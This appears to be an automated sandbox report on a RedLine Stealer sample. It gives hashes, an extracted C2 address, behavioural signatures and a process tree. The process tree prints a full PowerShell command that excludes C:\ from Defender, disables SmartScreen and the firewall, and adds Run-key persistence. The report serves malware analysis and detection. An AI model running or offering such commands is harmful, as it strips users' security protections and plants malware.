Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-08-2022 11:37
Behavioral task behavioral1: sample e4.exe, resource win7-20220715-en
Behavioral task behavioral2: sample e4.exe, resource win10v2004-20220721-en
General
Target: e4.exe
Size: 4.5MB
MD5: 5c371f2d51427f39d793c6df8487346c
SHA1: 8bbc4272d6e36abf84a0d4fac47d49b690bfacdf
SHA256: e42c63f0af341c2271346774a69bdbceed9cc21f041680bc00e8e0d137340b48
SHA512: 2f0d208bb52a44a085a9aa32169ba75ae3b5de2a552b2196532e59527eb7a0deb16fd87cc7363d7ec82627fdaba4ecf227bf2dd6da6331202a976a07c723ca34
Malware Config
Extracted
redline
1488
46.21.250.111:65367
auth_value: e1f55d6c61f97af563fc8c06a2c97666
Signatures

Modifies security service (2 TTPs, 1 IoCs)
Processes: powershell.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | powershell.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (3 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/4356-134-0x00000000003F0000-0x0000000000EC2000-memory.dmp | family_redline
behavioral2/memory/4356-135-0x00000000003F0000-0x0000000000EC2000-memory.dmp | family_redline
behavioral2/memory/4356-153-0x00000000003F0000-0x0000000000EC2000-memory.dmp | family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
Processes: svchost.exe
description | pid | process | target process
PID 2856 created 4992 | 2856 | svchost.exe | UpSys.exe
PID 2856 created 4312 | 2856 | svchost.exe | UpSys.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
Processes: e4.exe, TextOutputHost.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | e4.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TextOutputHost.exe

Downloads MZ/PE file

Executes dropped EXE (4 IoCs)
Processes: TextOutputHost.exe, UpSys.exe, UpSys.exe, UpSys.exe
pid | process
2264 | TextOutputHost.exe
4992 | UpSys.exe
4312 | UpSys.exe
4176 | UpSys.exe

Modifies Windows Firewall (1 TTPs, 1 IoCs)

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes: TextOutputHost.exe, e4.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | TextOutputHost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | TextOutputHost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | e4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | e4.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: TextOutputHost.exe, e4.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | TextOutputHost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | e4.exe

Drops startup file (1 IoCs)
Processes: TextOutputHost.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | TextOutputHost.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
behavioral2/memory/4356-134-0x00000000003F0000-0x0000000000EC2000-memory.dmp | themida
behavioral2/memory/4356-135-0x00000000003F0000-0x0000000000EC2000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe | themida
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe | themida
behavioral2/memory/4356-153-0x00000000003F0000-0x0000000000EC2000-memory.dmp | themida
behavioral2/memory/2264-154-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp | themida
behavioral2/memory/2264-156-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp | themida
behavioral2/memory/2264-157-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp | themida
behavioral2/memory/2264-159-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp | themida
C:\ProgramData\MicrosoftNetwork\System.exe | themida
behavioral2/memory/2264-177-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp | themida

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoCs)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" | powershell.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
Processes: e4.exe, TextOutputHost.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | e4.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | TextOutputHost.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Drops file in System32 directory (1 IoCs)
Processes: powershell.exe
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: e4.exe, TextOutputHost.exe
pid | process
4356 | e4.exe
2264 | TextOutputHost.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies data under HKEY_USERS (51 IoCs)

Suspicious behavior: EnumeratesProcesses (64 IoCs)

Suspicious use of AdjustPrivilegeToken (16 IoCs)
Processes: e4.exe, powershell.exe, UpSys.exe, svchost.exe, UpSys.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 4356 | e4.exe
Token: SeDebugPrivilege | 4396 | powershell.exe
Token: SeDebugPrivilege | 4992 | UpSys.exe
Token: SeAssignPrimaryTokenPrivilege | 4992 | UpSys.exe
Token: SeIncreaseQuotaPrivilege | 4992 | UpSys.exe
Token: 0 | 4992 | UpSys.exe
Token: SeTcbPrivilege | 2856 | svchost.exe
Token: SeTcbPrivilege | 2856 | svchost.exe
Token: SeDebugPrivilege | 4312 | UpSys.exe
Token: SeAssignPrimaryTokenPrivilege | 4312 | UpSys.exe
Token: SeIncreaseQuotaPrivilege | 4312 | UpSys.exe
Token: SeBackupPrivilege | 4396 | powershell.exe
Token: SeBackupPrivilege | 4396 | powershell.exe
Token: SeRestorePrivilege | 4396 | powershell.exe
Token: SeSecurityPrivilege | 4396 | powershell.exe
Token: SeDebugPrivilege | 4788 | powershell.exe

Suspicious use of WriteProcessMemory (14 IoCs)
Processes: e4.exe, TextOutputHost.exe, powershell.exe, svchost.exe, UpSys.exe
description | pid | process | target process
PID 4356 wrote to memory of 2264 | 4356 | e4.exe | TextOutputHost.exe
PID 4356 wrote to memory of 2264 | 4356 | e4.exe | TextOutputHost.exe
PID 2264 wrote to memory of 4396 | 2264 | TextOutputHost.exe | powershell.exe
PID 2264 wrote to memory of 4396 | 2264 | TextOutputHost.exe | powershell.exe
PID 4396 wrote to memory of 4992 | 4396 | powershell.exe | UpSys.exe
PID 4396 wrote to memory of 4992 | 4396 | powershell.exe | UpSys.exe
PID 4396 wrote to memory of 1112 | 4396 | powershell.exe | netsh.exe
PID 4396 wrote to memory of 1112 | 4396 | powershell.exe | netsh.exe
PID 2856 wrote to memory of 4312 | 2856 | svchost.exe | UpSys.exe
PID 2856 wrote to memory of 4312 | 2856 | svchost.exe | UpSys.exe
PID 2856 wrote to memory of 4176 | 2856 | svchost.exe | UpSys.exe
PID 2856 wrote to memory of 4176 | 2856 | svchost.exe | UpSys.exe
PID 4176 wrote to memory of 4788 | 4176 | UpSys.exe | powershell.exe
PID 4176 wrote to memory of 4788 | 4176 | UpSys.exe | powershell.exe

Processes

Process (depth 1): C:\Users\Admin\AppData\Local\Temp\e4.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\e4.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

Process (depth 2): C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory

Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

Process (depth 4): C:\ProgramData\UpSys.exe
Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

Process (depth 5): C:\ProgramData\UpSys.exe
Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

Process (depth 6): C:\ProgramData\UpSys.exe
Command line: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory

Process (depth 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

Process (depth 4): C:\Windows\system32\netsh.exe
Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
- Modifies Windows Firewall

Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\MicrosoftNetwork\System.exe
Filesize: 3.4MB
MD5: 55a6d22be09d762103ae315f97b58561
SHA1: f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA256: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA512: 4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

C:\ProgramData\UpSys.exe
Filesize: 923KB
MD5: efe5769e37ba37cf4607cb9918639932
SHA1: f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256: 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512: 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe
Filesize: 3.4MB
MD5: 55a6d22be09d762103ae315f97b58561
SHA1: f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA256: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA512: 4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820